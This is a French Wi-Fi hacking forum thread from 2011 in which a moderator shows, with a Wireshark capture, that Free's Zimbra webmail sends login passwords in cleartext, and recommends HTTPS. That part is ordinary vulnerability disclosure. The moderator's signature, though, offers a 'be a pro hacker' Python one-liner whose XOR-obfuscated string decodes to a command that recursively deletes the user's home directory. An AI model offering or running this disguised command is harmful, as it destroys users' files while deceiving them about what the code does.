Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-11-2011 19:17:56

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Faille : l'authentification du webmail de free se fait EN CLAIR

Bonsoir !

Les mails chez free sont gérés via la plateforme 'zimbra.free.fr'.
En plus d'être moche, elle n'est PAS DU TOUT sécurisée :

J'ai installé wireshark sur ma debian il y a peu.
Ce matin, je vais regarder mes mails, et au moment de cliquer sur 'connexion', je me suis dit "tiens, est-ce que l'authentification est sécurisée chez free ?"

J'ai donc lancé wireshark (qui sert a capturer tous les paquets passant par une interface réseau) sur ma carte wifi.

screenshotwlan0wireshar.png
319047856_dbf1ef3e92.jpg

Comme on peut le voir, après un petit tri des paquets, j'ai retrouvé celui qui est parti sur internet avec son sac à dos m'authentifier sur zimbra.free.fr

Et ce paquet contient bravement le mot de passe

EN CLAIR

après le login.

orly.jpg?1229112642
Hélas.. rly --'


Heureusement que je ne me connecte pas via un hotspot du type 'SFR WiFi Public', sinon tout le monde pourrait lire mon mot de passe en clair ! (lulz sad )

Pour pallier à ce problème, il faut passer en

HTTPS

. heureusement, les gars de chez zimbra ont pensé à tout, et il n'y a pas d'option 'utiliser le https'.

La méthode est donc d'ajouter un 's' dans la barre d'addresse de votre navigateur.

nb : l'ami qui.ne.veut.pas.être.cité me signale que depuis firefox 7 (où le protocole ne s'affiche plus) l'ajout du 's' ne permet pas le passage au https sur zimbra.free.fr (alors que cela fonctionne sur google par exemple)

Dernière modification par spawn (06-11-2011 19:21:36)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-11-2011 19:44:48

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 355

Re : Faille : l'authentification du webmail de free se fait EN CLAIR

Console toi, chez orange c'est encore pire tongue

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]